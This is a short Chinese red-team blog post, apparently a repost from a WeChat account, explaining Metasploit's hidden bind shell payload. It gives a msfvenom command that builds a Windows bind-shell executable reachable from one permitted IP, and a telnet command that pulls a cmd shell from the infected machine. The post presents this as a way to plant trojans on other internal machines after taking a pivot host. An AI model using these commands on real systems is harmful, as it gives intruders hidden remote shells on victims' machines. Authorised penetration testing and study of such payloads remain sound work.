Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

admin 2021年3月18日05:20:50评论143 views字数 749阅读2分29秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell


大家好,这里是 渗透攻击红队 的第 50 篇文章,本公众号会记录一些红队攻击的笔记(由浅到深),不定时更新


Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
正向SHELL


在内网渗透中,正向 bind shell 会经常用到,可能有些兄弟还不清楚什么是正向 shell:反向 reverse shell 就是通过我们监听,目标肉鸡运行 exe 我们就会收到一个反弹 shell;而正向就是目标肉鸡运行 exe,我们去连接肉鸡。


最近很多人说我发广告啥的,我只想说一句:所有的热爱都是在生活的前提上的,不管为了什么,前提是得保证能生存下去。



Metasploit 如何隐藏 Bind Shell

演示过程


首先通过 MSF 生成一个正向 shell:

msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.84.128 -f exe > bind_shell.exe

Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

之后再肉鸡上运行 bind_shell.exe :

Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

这个时候再 Hacker 机器上使用 Telnet 连接目标机器的时候,就会反弹一个 cmd shel 到黑客机器:

telnet 192.168.84.154 8889

Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

而此时使用其他机器与肉鸡建立 Telnet 是无法获取到 cmd shell 的:

Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

这样的好处在于你在做内网的时候拿下一台跳板机器,利用这台跳板机器当作黑客,生成一个正向木马丢到内网其他机器里,随时就可以通过 telnet 获取目标的 cmd  ,省去了一些麻烦。




参考文章:

https://evi1cg.me/archives/Don-t_touch_my_shell.html


Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

渗透攻击红队

一个专注于渗透红队攻击的公众号

Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell



Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
点分享
Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
点点赞
Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell
点在看

本文始发于微信公众号(渗透攻击红队):Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shell

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月18日05:20:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Metasploit 通过隐藏 Bind Shell,只允许指定目标接收反弹 Shellhttp://cn-sec.com/archives/294551.html

发表评论

匿名网友 填写信息